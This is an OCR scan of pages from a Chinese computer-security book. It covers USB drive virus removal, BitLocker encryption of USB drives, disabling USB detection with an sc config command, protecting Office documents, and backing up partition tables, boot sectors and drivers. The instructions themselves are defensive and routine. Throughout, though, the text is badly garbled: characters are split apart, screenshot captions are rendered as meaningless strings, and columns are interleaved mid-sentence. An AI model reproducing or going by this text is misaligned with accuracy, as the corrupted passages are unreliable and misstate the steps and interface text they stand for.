Ts sor: re a 
we i 
单 击 “扫描 病毒 ”按钮 ， 即 可 开始 打 
描 本 地 磁盘 和 移动 磁盘 中 的 病毒 文件 ， 如 


下 图 所 示 。 [Eee 图 单 去 “文件 夫 图 标 类 病毒 专 杀 工具 ? 
DER ES 后 面 的 “开始 查 杀 ” 按 钮 ， 打 开 “ 文 件 来 
过 图 标 类 病毒 专 杀 工 具 ” 窗 口 ， 如 下 图 所 示 。 


人 | 让 和 机。 | 二 《 冯 人 ) 一 “ms | 上 


PR 
毗 座 二 “| Fe 革 65 夯 
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扫描 系统 中 的 文件 夹 图 标 类 病毒 ， 如 下 图 
所 示 。 


[step 罗 扫描 完成 后 ， 在 “扫描 结果 ”中 显示 
扫描 出 来 的 病毒 文件 ， 并 显示 状态 为 扫描 


侈 提示 : Auto.exe 病毒 专 杀 工具 和 meex. 
exe 病毒 专 杀 工具 与 文件 夹 图 标 类 病毒 专 杀 
工具 的 使 用 类 似 ， 这 里 不 再 重 述 。 


10.4 如 盘 数 据 的 加 密 


对 磁盘 或 U 盘 加 密 主 要 是 使 用 Windows 
10 操作 系统 中 的 BitLocker 功能 ， 主 要 用 于 
解决 用 户 数 据 的 失窃 、 泄 露 等 安全 性 问题 。 


加 绝招 8: 启动 BitLocker 功 能 


刘 使 用 BitLocker 加密 磁盘 数据 之 前 ， 
需要 启动 BitLocker 功能 ， 具 体 的 操作 步骤 

如 下 。 

[step 图 右 击 “开始 ”按钮 ， 在 弹出 的 快捷 菜 

单 中 选择 “控制 面板 ”菜单 命令 ， 如 下 图 


step 图 单 击 “ 查 杀 病 毒 ” 按 钮 ， 即 可 开始 


第 10 章 


所 示 。 


任务 管理 器 (1) 


控制 面板 (P) 

5 源 管理 器 (E) 
搜索 (S) 
运行 (R) 
关机 或 注销 (U) 


点 面 ([D) 


打开 “控制 面板 ”窗口 ， 如 下 图 所 示 。 


0 
+ ,srs 


RsE 


[step 图 在 “控制 面板 ”窗口 中 单 击 “系统 和 
安全 ”连接 ， 打 开 “ 系 统 和 安全 ”窗口 ， 
如 下 图 所 示 。 

| ® SRDE 全 - OO x 


€ 个 由 ， 注 制 面板 系统 和 安全 ~ 已 | 搜索 控制 .， 户 
六 作用。 六 才 (E) 吾 看 V) 工具 


控制 面板 主页 Me 和 区 
下 等 RAM 的 大 小 和 站 理 吕 并 
> 里 多 放 远 R 访 月 。 启动 远航 且 
网 要 和 Internet 珀 看 这 让 机 的 名 称 
硬件 和 0 声音 章 电源 选项 
生子 更 站 电源 本 的 功能 | 更 次 计算 机 用 民 时 间 
用 = i 
- 文件 历史 记录 
oprah Ee 通过 文件 历史 记录 保存 你 的 文件 备 全 副 
对 是 、 语 计 和 区 域 记录 还 全 
Sn 风 份 和 还 原 (Windows 7) 
备 分 和 还 原 (Windows 7) 。 从 备份 还 原文 件 


各 BitLocker 驱动 器 加 密 


管理 BitLocker 
[ 


| sz 存储 空间 v 
[steep 轿 在 该 窗口 中 单 击 “BitLocker 驱动 器 
加 密 ” 链 接 ， 打开“BitLocker 驱动 器 加 密 ” 
窗口 ， 在 窗口 中 显示 了 可 以 加 密 的 驱动 器 
盘 符 和 加 密 状 态 ， 展 开 各 个 盘 符 后 ， 单 击 
盘 符 后 面 的 “启用 BitLocker” 和 链接 ， 对 各 
个 驱动 器 进行 加 密 ， 如 下 图 所 示 。 
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可 移动 U 盘 的 安全 防护 与 病毒 查 杀 


黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


| We Bhocker RE 
和 个 cker 一 ~ sss 
rm RE BEV IEM 
ER mt 


Windows10 (c:) BitLocker 已 关闭 


a 
ES © 
国 主 数 坊 驱动 器 


软件 (D;) Bitlocker 己 关闭 


LL 
二 ~ 8 
四 TM 工作 (E;) BitLocker 已 关闭 
| 9 aa 到 


| wis 可 移动 数据 开动 器 - BitLocker To Go 


step 较 单 击 U 盘 后 面 的 “启用 BitLocker” 
链接 ， 打 开 “ 正 在 启动 BitLocker” 窗 口 ， 
如 下 图 所 示 。 


BitLocker 驱动 看 DID 


正在 启动 Bitlocker 


hocker ETEDiat 儿 天， 
一 一 
让 清和 EE 雪 六 Buacker 过 全 条 下 郑 ， 


四 绝招 9: 为 U 盘 进行 加 密 


启动 BitLocker 后 ， 下 面 就 可 以 为 UU 盘 

数据 进行 加 密 操作 了 , 具体 的 操作 步骤 如 下 。 
step 车 启动 BitLocker 后 ， 打 开 “ 选 择 希 望 
解锁 此 驱动 器 的 方式 ”窗口 ， 选 中 “使 用 
密码 解锁 驱动 器 ” 复 选 框 , 按 要 求 输入 内 容 ， 
如 下 图 所 示 。 


有 ahtocker 秋 翅 ED) 


雹 择 希 望 解 宵 此 驱动 器 的 方式 
[a 
刘 码 应 让 全 大 小 写字 二 、 闭 字 、 室 符 以 及 征 二 。 


[step 图 单 去 “下 一 步 ”按钮 打开 “你 希望 
如 何 备份 恢复 密 钥 ”窗口 ， 可 以 选择 保存 
到 Microsoft 账户 、 保 存 到 文件 和 打印 恢复 
密 钥 选 项 ， 这 里 选择 保存 到 文件 选项 ， 如 
下 图 所 示 。 


¢ WM shocksr EMRED) 
你 项 各 如 何 备 份 焦 复 密 钥 ? 
克昌 7 记 和 于 和 各 委 上， 本 以 全 有 全 主语. 
人 保守 到 Microsoft 帐户 (MI 
全 保 季 到 文件 (月 


全 打印 恢复 寅 铀 (P) 


= 


[Sep 图 打开 “将 BitLocker 恢复 密 钥 另存 为 ” 
窗口 ， 在 本 窗口 中 将 选择 恢复 密 钥 保存 的 
位 置 ， 在 “文件 名 ”文本 框 中 更 改 文件 的 
名 称 ， 如 下 图 所 示 。 


可 
step 贺 单 去 “保存 ”按钮 ， 关 闭 对 话 框 ， 返 
回 “ 你 希望 如 何 备份 恢复 密 钥 ”窗口 ， 在 
本 窗口 中 显示 已 保存 恢复 密 钥 的 提示 信息 ， 
如 下 图 所 示 。 


全 MBitocker Em) 


你 基 相 如 何 备份 履 复 空 铀 ? 

© cerssss. 

红果 你 主 忆 它 生 或 考 于 失掉 能 十， 可 以 代 司 侈 挟 要 孚 访问 E 动 二 ， 
一 保存 到 Microsott 帐户 (M) 

地 保存 到 文件 (F) 


全 打印 焦 挟 安 铀 (P) 


FN || Hm 
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step 园 单 南 “ 下 一 步 ”按钮 打开“ 选择 要 
加 密 的 驱动 器 空间 大 小 ”窗口 , 如 下 图 所 示 。 


[和 晤 BtLocker 驱动 大 加 要 (DJ - 


选择 要 加 密 的 驱动 器 空间 大 小 


如 时 在 新 弧 动 器 开 新 电脑 上 设置 Bi ocker . 则 只 地 要 加 村 当前 使 月 的 驱动 二 部 今 、BiLocker 全 在 你 活 
0 新 数据 村 对 其 进行 王 动 加 密 . 


如 果 你 在 已 使用 的 电 及 或 了 动 总 上 启用 BitLocker . 请 考虑 加 意 整 个 要 动 号 .加 才 整 人 节 直 各 可 确 全 所 有 
元 所 , 哇 王 已 玫 除 全 可 能 价 杀 色 合 可 检索 信息 的 数据 均 受 到 保护 。 


图 仅 Jp 灾 已 用 习 机 空间 (最 适 合 于 新 电脑 或 新 把 动 硒 ， 旦 过 度 较 侠 )(U) 
口 j 加 0 本 苦 个 掀 二 (最 运 语 于 正在 使 用 中 的 电 汪 区 动 二 ， 但 运 度 较 候 )E) 


CJ Pm]| 


step 较 单 击 “ 下 一 步 ” 按 钮 ， 打开“ 选择 要 
使 用 的 加 密 模式 ”窗口 ， 如 下 图 所 示 。 
| Me BitLocker EbrE(D) 


选择 要 使 用 的 加 宣 模 式 


Windcws 10 版 本 1511) 引 入 了 新 的 于 委 加 斌 模式 (XTS-AES)， 此 借 式 浊 兴 更 多 的 完整 性 坟 特 ,但 与 早期 
板 本 的 Windows 不 本 宇 ， 


如 果 这 是 要 在 衬 期 板 本 的 Windows 上 洋 用 鸣 可 相 功 下 功 脆 . 则 应 和 择 芒 富 模式 , 


知 果 过 是 一 个 司 宇 手动 吕 或 者 此 权 动 器 只 会 在 至 少 运行 Window 10 ( 乒 本 1511) 或 更 高 此 本 的 设备 上 
便 用 , 则 亚 汗 学术 多 7 本 磺 式 


口 盖 [ 异 式 (最 适合 用 于 此 设备 上 的 医 十 颈 动 哺 )MN) 
加 莱 窜 模式 ( 彝 适 合用 于 可 从 此 设备 移动 的 驱动 夭 MC) 


sm 
step 园 单 击 “下 一 步 ”按钮 ， 打开“ 是 否 准 
备 加 密 该 驱动 器 ”窗口 ， 如 下 图 所 示 。 


《4 镶 BiLocker 驱动 器 加 密 (D;) 


是 否 准 备 加 密 该 驱动 器 ? 
你 能 够 使 用 安 码 解 乌 该 红 动 器 。 
加 训 扣 作 可 能 于 要 一 些 时 间 ,具体 取决 于 红 动 号 的 大 小 - 


在 加 密 完成 前 ， 文 件 不 妥 保 护 。 


[WE 


[Eee 国 单 二 “开始 加 窗 ” 按 钮 ， 开 始 对 可 移 
动 驱动 器 进行 加 密 ， 如 下 图 所 示 ， 加 密 的 
时 间 与 驱动 器 的 容量 有 关 ， 但 是 加 密 过 程 
不 能 中 止 ， 如 下 图 所 示 。 
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向 BitLocker 驱动 器 加 密 (D;) 


开始 加 密 


Le 
遍 加 到 开始 之 前 不 要 移 除 驱 动 器 。 


step 图 开始 加 密 完 成 后 ， 打 开 “BitLocker 
驱动 器 加 密 ” 窗 口 ， 显 示 加 密 的 进度 ， 如 
下 图 所 示 。 


BitLocker 驱动 器 加 宅 


< 误 正在 加 密 .… 
驱动 器 D: 0.4% 已 完成 


侈 提 示 : 如 果 希 望 加 密 过 程 暂停 ， 则 单 击 
“暂停 ”按钮 暂停 驱动 器 的 加 密 , 如 下 图 所 示 。 


BitLocker 驱动 吕 加 客 

售 加 密 已 经 暂停 
驱动 器 D: 1.2% 已 完成 
[ 


筷 请 在 得 除 驱 动 串 之 前 暂停 加 密 ,否则 会 损坏 驱动 器 上 的 文 
件 . 


管理 BkLocker 
[Eee 图 单 去 “继续 ”按钮 ， 可 继续 对 驱动 器 
进行 加 密 ， 但 是 在 完成 加 密 过 程 之 前 ， 不 
能 取 下 U 盘 ， 否 则 驱动 器 内 的 文件 将 被 损 
坏 。 加 密 完 成 后 ， 将 弹出 信息 提示 对 话 框 ， 
提示 用 户 已 经 加 密 完成 。 单 击 “ 关 闭 ” 按 钮 ， 
TU 盘 的 加 密 完成 ， 如 下 图 所 示 。 


BitLocker 驱动 器 加 客 x 
< 售 D: 的 加 密 已 完成 。 
管理 BitLocker 
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黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


10.5 “实战 演练 
昌 实战 演练 1 一 一 U 盘 病毒 的 手动 删除 


使 用 显示 系统 隐藏 文件 的 方法 可 以 手 
工 进行 U 盘 病 毒 的 判断 删除 ， 具 体 的 操作 

步骤 如 下 。 

Eee 国 在 “此 电脑 ”窗口 中 , 选择 “文件 一 * 更 

改 文件 夹 和 搜索 选项 ”选项 ， 如 下 图 所 示 。 


EE 2 
Ee 
加 ] sia 多 用 位 置 
贡 病 EF 
Dn 22 僵 3 
地 
4 到 


[SS Bn 


加 mu 
X xmc 


PER 


[step 图 在 弹出 的 “文件 夹 选项 ”对 话 框 中 选 
择 “ 查 看 ”选项 卡 ， 然 后 取消 选中 的 “ 隐 
藏 受 保护 的 操作 系统 文件 ” 复 选 框 , 选中 “ 显 
示 隐 藏 的 文件 、 文 件 夹 和 驱动 器 ” 单 选 按 钮 ， 
取消 选中 的 “隐藏 已 知 文件 类 型 的 扩展 名 ” 
复 选 框 ， 单 击 “ 确 定 ” 按 钮 ， 如 下 图 所 示 。 


4 


EE 


4 


1 


gm 
友人 


Ce] 


ED) 


Ne Wo A) 


Eee 图 打开 UU 盘 根 目录 ， 查 看 是 否 存 在 
autorun.inf、msvcr71.dll、ravmone.exe 等 类 
似 的 异常 文件 ， 如 果 有 将 其 删除 即 可 ， 如 
下 图 所 示 。 
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人 税 提 示 : 在 U 盘 根 目 录 默 认 正 常 状 态 下 是 
没有 隐藏 文件 的 ， 如 果 发 现 有 ， 那 就 要 小 
心 查看 了 ， 十 有 八 九 就 是 中 招 了 ! 


实战 演练 2 一 一 禁止 计算 机 使 用 U 盘 


由 于 在 Windows 10 系统 中 拥有 即 插 即 BB%6 
用 的 功能 ， 所 有 硬件 连接 都 能 够 自动 检测 
自动 安装 驱动 。 如 果 希 望 禁止 计算 机 使 用 
UU 盘 的 话 ， 最 直接 的 办 法 就 是 禁用 硬件 检 
测 服务 ， 这 样 即使 将 U 盘 插 到 计算 机 对 应 
接口 也 不 会 发 现任 何 硬件 设备 。 

禁用 硬件 检测 服务 的 具体 操作 步骤 
如 下 。 
[es 国 右 去 “开始 ”按钮 ， 在 弹出 的 快捷 菜 
单 中 选择 “命令 提示 符 ( 管 理 员 ) (A)” 菜 
单 命令 ， 如 下 图 所 示 。 


命令 提示 符 (管理 员 )(A) NA 


任务 管理 器 (1) 
控制 面板 (P) 

文件 资源 管理 器 (E) 
搜索 (S) 


运行 (R) 


关机 或 注销 (U) 


桌面 (D) 


ww 


step 图 打开 “命令 提示 符 ” 窗 口 ， 在 其 
中 输入 sc config ShellHWDetection start= 


disabled 命 令 ， 按 Enter 键 ， 如 果 出 现 

“ChangeServiceConfig” 成 功 提示 信息 ， 
就 说 明 禁 用 硬件 检测 服务 成 功 ， 如 下 图 
所 示 。 


而 管理 员 : CNwindowsvsystem3zwmd ex - oO x 


icrosoft Windows [版 本 10. 0. 16299. 936] ~ 
(c) 2017 Microsoft Corporation。 保 留 所 有 权利 。 


:AUsersVAdministrator>sc config ShellHWDetection start= disabled 
sc] ChangeServiceContis 


:\Users\Administrator>, 


[step 图 如 果 想 恢复 硬件 检测 功能 ， 可 以 直接 
运行 sc config shellhwdetection start= auto 命 
令 ， 如 下 图 所 示 。 


而 管理 号 : C\windows\system32\cmd.exe 一 口 x 
(ce) 2017 Microsoft Corporation。 保 留 所 有 权利 。 A 


C:\Users\AdministratorYsc config ShellH¥Detection start= disab 
ed 
[SC] ChangeServiceConfig 成 功 


C:\Users\Administrator>sc config shellhwdetection start= auto 
[SC] ChangeServiceConfig 成 功 


C:\Users\Administrator> 


10.6 小 试 身手 
各 浊 练习 1: 限制 编辑 Word 文 档 


限制 编辑 是 指控 制 其 他 人 可 对 文档 进 

行 哪些 类 型 的 更 改 ， 对 文档 具有 保护 作 
用 ， 为 文档 添加 限制 编辑 的 具体 操作 步骤 
如 下 。 
[step 园 打开 需要 限制 编辑 的 Word 文档 ， 单 
击 “ 文 件 ” 选 项 卡 , 在 打开 的 列表 中 选择 “ 信 
息 ” 选项 ， 在 “信息 ”区 域 单 击 “保护 文档 ” 
按钮 , 在 弹出 的 下 拉 菜 单 中 选择 “限制 编辑 ” 
选项 ， 如 下 图 所 示 。 


第 10 章 “可 移动 U 盘 的 安全 防护 与 病毒 查 杀 二 Se 


二 可 
终 版 


Fo 上 


pp 
选中 “ 仅 允 许 在 文档 中 进行 此 类 型 的 编辑 ” 
复 选 框 ， 单 击 “ 不 允许 任何 更 改 ( 只 读 )” 
文本 框 右 侧 的 下 拉 按 钮 ， 在 弹出 的 下 拉 列 
表 中 选择 允许 修改 的 类 型 ， 这 里 选择 “不 
允许 任何 更 改 〈 只 读 )” 选 项 ， 如 下 图 所 示 。 


限制 编辑 > 
1 了 人 
RN9 池 证 的 桂 式 妥 轩 区 
ED 
2 将 


网 仅 f 许 在 文档 中 进行 此 关 开 的 
的 


[eraasmzmn 图 
修订 


部 更 信用 广 
.启动 浊 制 民力 


雹 是否 准 备 应 用 这 此 设置? (多 可 以 
rr 


[Eee 国 单 击 “限制 编辑 ” 窗 格 中 的 “是 ， 启 
动 强制 保护 ”按钮 ， 如 下 图 所 示 。 


限制 编辑 
并 下 文档 中 送行 此 关 理 的 
交合 
TFIR 击 | 


9 项 可 辐 


ERE HH 
其 任 章 六 名 的 必 


1 


SEE 黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


[step 轩 弹出 “启动 强制 保护 ”对 话 框 ， 在 对 
话 框 中 选中 “密码 ” 单 选 按钮 ， 输 入 新 密 
码 并 确认 新 密码 ， 单 击 “ 确 定 ” 按 钮 ， 如 
下 图 所 示 。 


启动 强制 保护 ? 


保护 方法 
图 BA) 
(文档 没有 加 密 。 悉 意 用 户 可 能 会 编辑 文件 和 删除 密码 。) 


〇 用户 验证 中 
(已 验证 的 所 有 者 可 以 删除 文档 保护 。 文 档 被 加 密 并 启用 
“限制 访问 "。) 


人 @ 提 示 : 如 果 选 中 “用 户 验证 ” 单 选 按钮 ， 
已 验证 的 所 有 者 可 以 删除 文档 保护 。 

[sep 园 此 时 就 为 文档 添加 了 限制 编辑 。 当 阅 
读者 想 要 修改 文档 时 ， 在 文档 下 方 显示 “由 
于 所 选 内 容 已 被 锁定 ， 您 无 法 进行 此 更 改 ? 
字样 ， 如 下 图 所 示 。 


取消 


月 :开交 5 


招聘 人 数 。 
工作 地 点 。 


郑州 市 x xX 街 XX 大 厦 X 


4 
和 由 于 所 选 内 容 已 被 搞定， 您 无 法 进行 此 更 改 。 


如 果 用 户 想 要 取消 限制 编辑 ， 在 “ 限 
制 编辑 ” 窗 格 中 单 去“ 停止 保护 ”按钮 即 可 ， 
如 下 图 所 示 。 


限制 编辑 

权限 

文 攻 受 保护 , 以 防止 六 和。 
Rs 者 比 区 寺 . 


显示 可 编辑 的 所 有 区 域 
| 突出 旺 示 可 蝙 辑 的 区 域 


停止 保护 
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练习 2: 保护 U 盘 中 的 办 公文 档 


有 时 ， 癌 盘 中 会 保存 一 些 重要 的 办 公 吕 
文件 ， 如 使 用 Excel 制作 的 销售 报表 、 使 用 
Word 文 档 制作 的 业务 合同 等 ， 不 过 这 些 文 
档 格式 都 具有 自我 保护 功能 ， 如 使 用 Excel 
自身 功能 可 以 加 密 、 解 密 Excel 文件 ， 其 具 
体 的 操作 步骤 如 下 。 

[SGB 国 打开 需要 保护 当前 工作 表 的 工作 簿 ， 
单 击 “文件 ”选项 卡 ， 在 打开 的 列表 中 选 
择 “ 信 息 ”选项 ， 在 “信息 ”区 域 单 击 “ 保 
护 工作 簿 ”按钮 ， 在 弹出 的 下 拉 菜单 中 选 
择 “ 保 护 当前 工作 表 ” 选 项 ， 如 下 图 所 示 。 


员工 基本 资料 表 
文档 > 素材 
保护 工作 簿 
ee He Tre 


直 标记 为 最 终 状 态 (F) 


恒 其 是否 包含 ; 
经. 作者 的 姓 


选中 “保护 工作 表 及 锁定 的 单元 格 内 容 ” 复 选 
框 ,也 可 以 在 “允许 此 工作 表 的 所 有 用 户 进行 ” 
列表 中 选择 允许 修改 的 选项 ， 如 下 图 所 示 。 


保护 工作 表 人 x 


取消 工作 表 保护 时 使 用 约 密码 (P): 


第 10 章 ”可 移动 U 盘 的 安全 防护 与 病毒 查 杀 二 SS 


step 图 弹出 “确认 密码 ”对 话 框 ， 在 此 输入 
密码 ， 单 击 “ 确 定 ” 按 钮 ， 如 下 图 所 示 。 


左 认 宇 码 ? x 
二 
重新 给 入 灾 码 (R): 
| 呈 
警告: 如 果 寺 失 或 志 记 字 码 ， 则 无 法 检 其 多 复 . 建议 检 2 
杰 码 及 其 相应 工作 筹 和 工作 表 名 称 的 列表 保存 在 安全 的 5 
地 方 (请 记 住 , 密码 是 区 分 大 小 所 的 )。 Se 
Ee 


CJ 可 ; | 
Bp 罗 返 回 到 Excel 工作 表 ， 双 击 任 一 单元 [Bee 图 在 弹出 的 “撤销 工作 表 保 护 ” 对 话 框 
格 进行 数据 修改 ， 则 会 弹出 如 下 图 所 示 的 中， 输入 设置 的 密码 ， 单 击 “确定 ”按钮 


提示 对 话 框 。 即 可 取消 保护 ， 如 下 图 所 示 。 
Microeof Eoxcel x 向 消 工 作 表 保护 时 x 
诺 s Te sm | 

EGG 如 果 妥 取消 对 工作 表 的 保护 ， 可 单 击 


“信息 ”选项 卡 ， 然 后 在 “保护 工作 簿 ” 
选项 中 单 击 “ 取 消 保护 ” 超 链接 ， 如 下 图 
所 示 。 
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第 11 草 ”磁盘 数据 的 备份 与 
恢复 技巧 


计算 机 系统 中 的 大 部 分 数据 都 存储 在 磁盘 中 ， 而 磁盘 又 是 一 个 极 易 出 现 问 题 的 部 件 。 
为 了 能 够 有 效 地 保护 计算 机 的 系统 数据 ， 最 有 效 的 方法 就 是 将 数据 进行 备份 ， 这 样 ， 一 旦 
磁盘 出 现 故 障 ， 就 能 把 损失 降 到 最 低 。 本 章 介 绍 磁盘 数据 的 备份 与 恢复 技巧 ， 主 要 内 容 包 
括 各 类 磁盘 数据 的 备份 、 恢 复 各 类 磁盘 数据 、 使 用 数据 恢复 工具 恢复 丢失 的 数据 等 。 


11.1 备份 各 类 磁盘 数据 


磁盘 当中 存放 的 数据 有 很 多 类 ， 如 分 
区 表 、 引 导 区 、 驱 动 程序 等 系统 数据 ， 还 
有 电子 邮件 、 系 统 桌 面 数据 、 磁 盘 文 件 等 
本 地 数据 ， 对 这 些 数据 进行 备份 可 以 在 一 
定 程 度 上 保护 数据 的 安全 。 


温 绝 招 1: 备份 分 区 表 数 据 


$l 如 果 分 区 表 损 坏 会 造成 系统 启动 失败 、 

数据 丢失 等 严重 后 果 。 这 里 以 使 用 DiskGe- 
nius V3.2 软件 为 例 ， 来 讲述 如 何 备份 分 区 
表 ， 具 体 的 操作 步骤 如 下 。 i 
[step 图 打开 软件 DiskGenius V4.9， 选 择 需要 “ 
保存 备份 分 区 表 的 分 区 ， 如 下 图 所 示 。 pa 


1 OE ee HRN i 


弹出 “设置 分 区 表 备 份 文件 名 及 路 径 ” 
对 话 框 ， 在 “文件 名 ”文本 框 中 输入 备份 
分 区 表 的 名 称 ， 如 下 图 所 示 。 


个 国 ，&m 肪 ， 广 机 ~ eA 


SH < 


六 HE | 于 63E 表 
Fm: DiskGerius 和 区 才 各 从 六 prt hp 


~ Sax wh 
Ee 到 [Eee 加 单 去 “保存 ”按钮 ， 即 可 开始 备份 分 


3 


区 表 ， 当 备份 完成 后 ， 弹 出 DiskGenius 提 


Step 加 选择 “硬盘 ”一 “备份 分 区 表 ” 菜 单 
选项 ， 用 户 也 可 以 按 F9 键 备 份 分 区 表 ， 如 
下 图 所 示 。 


示 对 话 框 ， 提 示 用 户 当 前 硬盘 的 分 区 表 已 
经 备份 到 指定 的 文件 中 ， 如 下 图 所 示 。 


DiskGenius x 


当前 硬盘 "HDO:WDCWD5000AAKX-08U6AA0(466GB)" 的 分 区 表 已 
备份 到 文件 "C\UsersAdministrator\Documents\ 备 份 分 区 囊 .ptf。 

为 了 分 区 表 备 份 文件 的 安全 ， | 当前 醒 生 以 外 的 硬盘 或 其 它 
介质 中 。 


侈 提示 : 为 了 分 区 表 备 份 文件 的 安全 ， 建 
议 将 其 保存 到 当前 硬盘 以 外 的 硬盘 或 其 他 
存储 介质 中 ， 如 可 盘 、 移 动 硬盘 、 光 盘 等 。 


绝招 2: 备份 引导 区 数据 


在 操作 系统 中 ， 引 导 区 起 着 非常 重要 
的 作用 ， 它 记录 着 一 些 硬盘 最 基本 的 信息 ， 
如 硬盘 的 分 区 信息 等 ， 这 些 信息 可 以 保证 
硬盘 能 正常 工作 ， 但 如 果 这 些 信息 被 修改 
了 ， 那 么 ,硬盘 里 的 数据 就 会 丢失 。 因 此 ， 
计算 机 用 户 要 对 引导 区 进行 备份 ， 以 便 在 
引导 区 受到 病毒 和 木马 的 攻击 时 ， 还 原 引 
导 区 中 的 信息 。 

备份 引导 区 的 工具 有 多 种 ， 下 面 介绍 
如 何 利用 《瑞星 全 功能 安全 软件 》 来 备份 
引导 区 ， 具 体 的 操作 步骤 如 下 。 
右 击 “开始 ”按钮 ， 在 弹出 的 快捷 菜 
单 中 选择 “瑞星 全 功能 安全 软件 ”菜单 命 
令 ， 打 开 “ 瑞 星 全 功能 安全 软件 ” 主 窗口 ， 
如 下 图 所 示 。 


Bp 国 单 主 “瑞星 工具 ”按钮 打开“ 瑞星 
工具 ”窗口 ,在 其 中 选择 “引导 区 还 原 ” 选 项 ， 
如 下 图 所 示 。 
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ET 


[step 图 打开 “引导 区 还 原 ” 窗 口 ， 在 其 中 选 
中 “备份 引导 区 ” 单 选 按钮 ， 如 下 图 所 示 。 


六 引 SE 珠 一 X 
合用 安全 工具 可 以 帮助 你 备份 或 者 恢复 引导 区 数据 
@ 备 份 引 S 区 
口 类 夏 引导 区 
La 


[ep 加 单 击 “ 下 一 步 ” 按 钮 打开 “引导 区 
还 原 ” 窗 口 ， 在 其 中 可 以 设置 引导 区 备份 
的 保存 目录 ， 如 下 图 所 示 。 


准备 引导 到 备份 … 
选择 目录 
CiProgam FiesRisngRISboctdat 济 
确定 取消 


Ber 国 或 单 圭 “浏览” 按钮， 打开“ 浏览 广 
件 夹 ”对 话 框 ， 在 “选择 目录 ”列表 框 中 
选择 用 于 保存 备份 文件 的 文件 夹 ， 如 下 图 
所 示 。 
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step 园 单 击 “ 确 定 ” 按 钮 ， 返 回 到 “引导 区 
还 原 ” 窗 口中 ， 如 下 图 所 示 。 


饮 引 SE 还 原 


准备 引导 区 备份 … 
选择 目录 
FE CC 到 
确定 取消 


[step 国 单 去 “确定 ”按钮 ， 开 始 备份 引导 区 
文件 ， 由 于 引导 区 文件 不 是 很 大 ， 随 即 弹 
出 “提示 信息 ”对 话 框 , 提示 用 户 备份 成 功 ， 
如 下 图 所 示 。 

提示 X 


@ am 


[step 较 单 击 “确定 ”按钮 ， 关闭 “提示 信 
息 ” 对 话 框 。 打 开 备 份 文件 保存 的 位 置 ， 
即 可 在 其 中 看 到 备份 的 引导 区 文件 ， 如 下 
图 所 示 。 


=| 加 局 :| uF) EC 
rn 二 本 . 
人 避让 5 
对 快速 访问 
看 orver 
全 oneprive hi 
国 此 到 及 rogram fi 
”ProgramData 
有 四 Topownlcad 
画 画 上 下 window 
ee 加 
4 了 mr 
pe 里。oneca7 
国 晤 rsboctdat 
各 Windows10 cy 了 rambrdat 
二 本 地 碚 盘 (D:) 
本 地 碰 盘 (E 
| 一 -加 
11 人 项目“ 才 h1 人 日 100 KB = 


绝招 3: 备份 驱动 程序 

在 Windows 10 操作 系统 中 ， 用 户 可 以 
对 指定 的 驱动 程序 进行 备份 。 一 般 情况 下 ， 
用 户 备份 驱动 程序 常常 要 借助 于 第 三 方 软 
件 ， 比 较 常用 是 《驱动 精灵 》 软 件 。 
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1. 使 用 《驱动 精灵 》 修 复 有 异常 的 驱动 

《驱动 精灵 》 是 由 驱动 之 家 研发 的 一 款 
集 驱 动 程序 自动 升级 、 驱 动 程序 备份 、 驱 
动 程序 还 原 、 驱 动 程序 卸载 、 硬 件 检测 等 
多 功能 于 一 身 的 专业 驱动 软件 。 利 用 《 驱 
动 精灵 》 可 以 在 没有 驱动 光盘 的 情况 下 ， 
为 自己 的 设备 下 载 、 安 装 、 升 级 、 备 份 驱 
动 程序 。 

利用 《驱动 精灵 》 修复 异常 驱动 程序 
的 具体 操作 步骤 如 下 。 
[se 加 下 载 并 安装 好 《了 驱动 精灵 》 后 ， 直 接 
双击 计算 机 桌面 上 的 “驱动 精灵 ”图 标 ， 
即 可 打开 该 程序 ， 如 下 图 所 示 。 


[Bee 图 在 “驱动 精灵 ”窗口 中 单 击 “立即 检 
测 ” 按 钮 , 即 可 开始 对 计算 机 进行 全 面体 检 ， 
如 下 图 所 示 。 


step 图 检测 完成 后 ， 会 在 “驱动 管理 ”界面 
给 出 检测 结果 ， 如 下 图 所 示 。 


[step 图 单 去 “一 键 安 装 ” 按 钮 ， 即 可 开始 下 
载 并 安装 有 异常 的 驱动 程序 ， 如 下 图 所 示 。 


[ey 正在 下 载 , 安装 驱动 ， 请 稍 候 


2. 使 用 《驱动 精灵 》 备 份 单个 驱动 程序 


[step 图 在 《驱动 精灵 》 窗 口中 选择 “百宝箱 ” 
选项 卡 ， 进 入 “百宝箱 ”界面 ， 如 下 图 所 示 。 


[sep 图 单 去 “驱动 备份 ”图 标 ， 打 开 “ 驱 动 
备份 还 原 ” 工 作 界 面 ， 在 其 中 显示 了 可 以 
备份 的 驱动 程序 ， 如 下 图 所 示 。 


四 “修改 文件 路 径 ”链接 ， 即 可 打 
开 “ 设 置 ”对 话 框 ， 在 其 中 可 以 设置 驱动 
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程序 备份 文件 的 保存 路 径 和 备份 设置 类 型 ， 
如 将 驱动 程序 备份 的 类 型 设置 为 ZIP 压缩 
文件 和 将 驱动 程序 备份 到 文件 夹 两 个 类 型 ， 
如 下 图 所 示 。 


文件 路 径 【恢复 暑 认 路 径 


远 择 目录 打开 目录 


生 备份 驱动 到 文件 夫 
备份 驱动 到 ZIP 文 件 


[step 轩 设置 完毕 后 ， 单 击 “ 确 定 ” 按 钮 ， 返 

回 到 “了 驱动 备份 还 原 ” 工 作 界面 ， 在 其 中 
单 击 某 个 驱动 程序 右 侧 的 “备份 ”按钮 ， 
即 可 开始 备份 单个 硬件 的 驱动 程序 ， 并 显 
示 备 份 的 进度 ， 如 下 图 所 示 。 


BE ed opre sou (cous 而 


国 备份 完毕 ， 会 在 硬件 驱动 程序 的 右 侧 
Eee 的 信息 提示 ， 如 下 图 所 示 。 
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3. 使 用 《驱动 精灵 》 一 键 备份 所 有 驱 绝招 4: 备份 电子 邮件 
动 程序 随 着 网 络 的 日 益 普及 ， 越 来 越 多 的 人 

一 台 完 整 的 计算 机 包括 主板 、 显 卡 、 ， 使 用 电子 邮件 进行 学 习 、 交 流 、 娱 乐 以 及 
网 卡 、 声 卡 等 硬件 设备 ， 要 想 使 这 些 设备 ， 办公 等 ， 显 然 电 子 邮件 的 内 容 多 数 是 比较 
能 够 正常 工作 ， 就 必须 在 安装 好 操作 系统 ”重要 的 信息 。 因 此 ， 为 了 防止 病毒 与 木马 
